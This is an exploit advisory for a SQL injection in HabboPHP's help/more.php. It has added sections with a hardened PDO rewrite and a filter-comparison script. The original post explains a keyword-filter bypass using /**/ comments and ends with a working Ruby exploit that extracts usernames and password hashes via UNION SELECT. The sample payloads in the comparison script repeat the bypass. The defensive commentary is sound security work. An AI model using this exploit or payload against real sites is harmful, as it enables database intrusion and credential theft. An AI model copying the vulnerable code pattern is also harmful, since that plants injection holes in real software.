HabboPHP <= 1.2.2 SQL injection

# Exploit Title: HabboPHP SQL injection
# Date: 29/08/2012
# Exploit Author: Kallimero
# Vendor Homepage: http://habbophp.com/downloads.php
# Version: All
# Tested on: Debian



Introduction
============

I don't really like habbo.
Moreover, every habbo cms I checked was full of crap (backdoor, huge security holes, etc).
But when a strange unknown claimed that HabboPHP had no vulnz, I had to release at least one.
There we go.

The vuln
========


First let's see the code :

---------------[help/more.php]---------------

if(isset($_GET['id']) && empty($_GET['id']) OR !is_numeric($_GET['id']))
        header('Location:/');
        
$query=mysql_query("SELECT * FROM habbophp_help_articles WHERE id=".safe($_GET['id'],'SQL')."");
$row=mysql_fetch_array($query);

---------------[help/more.php]---------------

A header() call is not enough to redirect the user: the PHP code after it is still executed unless the script calls die() or exit.
Therefore we can inject into $_GET['id']. The safe() function is useless here because the value sits in a numeric context, so no quotes have to be added to inject SQL code.
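For comparison, this is how the same fragment looks once the two defects are removed. It is an added example, not HabboPHP's code: it assumes a PDO connection in `$pdo` and the same `habbophp_help_articles` table, and drops the `safe()` helper entirely, because a bound integer parameter never reaches the SQL text.

```php
<?php
// Hardened rewrite of the help/more.php fragment (added example, not HabboPHP code).
// Assumes $pdo is an open PDO connection to the HabboPHP database.

// 1. Validate strictly: the id must be a plain string of digits. is_numeric()
//    also accepts values such as "1e3" or " 1", so it is not an integer check,
//    and $_GET['id'] may be an array (?id[]=1), hence the is_string() test.
$id = $_GET['id'] ?? '';
if (!is_string($id) || !ctype_digit($id)) {
    header('Location: /');
    // 2. Stop here. header() only queues a response header; without this exit
    //    the rest of the script, query included, still runs.
    exit;
}

// 3. Parameterise: the value is bound as an integer and never concatenated
//    into the statement, so no keyword filtering is needed at all.
$stmt = $pdo->prepare('SELECT * FROM habbophp_help_articles WHERE id = :id');
$stmt->bindValue(':id', (int) $id, PDO::PARAM_INT);
$stmt->execute();
$row = $stmt->fetch(PDO::FETCH_ASSOC);

if ($row === false) {
    // Unknown article: redirect and stop, same as the validation failure above.
    header('Location: /');
    exit;
}
```

The order matters: the input check rejects anything that is not an integer id, the exit prevents the rest of the page from running on a rejected request, and the prepared statement removes the injection even if a later change loosens the validation.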


The PoC :
=========

The developers implemented a WAF:

---------------[includes/core.php]---------------

$injection = 'INSERT|UNION|SELECT|NULL|COUNT|FROM|LIKE|DROP|TABLE|WHERE|COUNT|COLUMN|TABLES|INFORMATION_SCHEMA|OR' ;
foreach($_GET as $getSearchs){
        $getSearch = explode(" ",$getSearchs);
        foreach($getSearch as $k=>$v){
                if(in_array(strtoupper(trim($v)),explode('|',$injection))){
                        exit;
                }
        }
}
---------------[includes/core.php]---------------

Well, good try. At least it's fun.
As you can see, they explode every GET variable on spaces ( $getSearch = explode(" ",$getSearchs); ) in order to search for injection keywords.
What if you don't use a single space in the injection?
It passes the WAF. w00t.
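The reason the filter fails is that it matches tokens before canonicalising the input. The following added example (not HabboPHP code) reduces the core.php check to one function, puts a canonicalising variant beside it, and runs both over a few constructed sample values of the `id` parameter. It is log-side detection logic only and is not a fix: a keyword blocklist stays a blocklist, and the real remedy is the parameterised query.

```php
<?php
// Added example, not HabboPHP code. Compares the original space-split keyword
// check from includes/core.php with a check that canonicalises the value first.
// The sample values below are constructed for the demonstration.

const KEYWORDS = ['INSERT', 'UNION', 'SELECT', 'NULL', 'COUNT', 'FROM', 'LIKE', 'DROP',
                  'TABLE', 'WHERE', 'COLUMN', 'TABLES', 'INFORMATION_SCHEMA', 'OR'];

// The original check, reduced to a single value: split on ' ' only and compare
// each token against the keyword list.
function original_filter_hits(string $value): bool
{
    foreach (explode(' ', $value) as $token) {
        if (in_array(strtoupper(trim($token)), KEYWORDS, true)) {
            return true;
        }
    }
    return false;
}

// Canonicalise before matching: strip SQL comments, then collapse every run of
// whitespace into one space so that tokens separated by /**/ become visible.
function canonicalise(string $value): string
{
    $v = preg_replace('#/\*.*?\*/#s', ' ', $value);  // /* ... */ inline comments
    $v = preg_replace('/--.*$/m', ' ', $v);           // -- line comments
    $v = preg_replace('/\s+/', ' ', $v);              // collapse whitespace
    return trim($v);
}

// Match whole keywords in the canonical form, case-insensitively.
function canonical_filter_hits(string $value): bool
{
    $pattern = '/\b(' . implode('|', KEYWORDS) . ')\b/i';
    return preg_match($pattern, canonicalise($value)) === 1;
}

// Constructed sample values of $_GET['id'] (PHP has already URL-decoded them).
$samples = [
    '42',                               // benign article id
    '-1 union select 1,2,3',            // spaces: the original check catches it
    '-1/**/union/**/select/**/1,2,3',   // no spaces: the original check misses it
];

foreach ($samples as $value) {
    printf("%-34s original=%-5s canonical=%s\n",
        $value,
        var_export(original_filter_hits($value), true),
        var_export(canonical_filter_hits($value), true));
}
```

Run with `php filter_compare.php` (any file name); the third line shows `original=false canonical=true`, which is the gap the advisory exploits. Canonicalisation closes this particular gap for an alerting rule, but any blocklist remains a guess about attacker syntax, which is why the fix belongs in the query, not in the filter.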

Here is a Ruby exploit:

-------------------------------------
#!/usr/bin/ruby

require 'net/http'

site = 'localhost'
path = '/pentest/habbophp/'
p = Net::HTTP.get(site, "#{path}help/more.php?id=-1/**/union/**/select/**/1,2,3,concat(0x7e,username,0x3a,password,0x7e)/**/FROM/**/users/**/LIMIT/**/1--+-")
puts p.scan(/~(.+?)~/)
------------------------------------

Have fun.



How to Fix ?
============

Stop habbo, grow up, and go meet some people outside.

Thanks
======

All hwc members : Necromoine, fr0g, AppleSt0rm, St0rn, Zhyar, k3nz0, gr4ph0s.
Please visit : http://www.orgasm.re/

Groucho

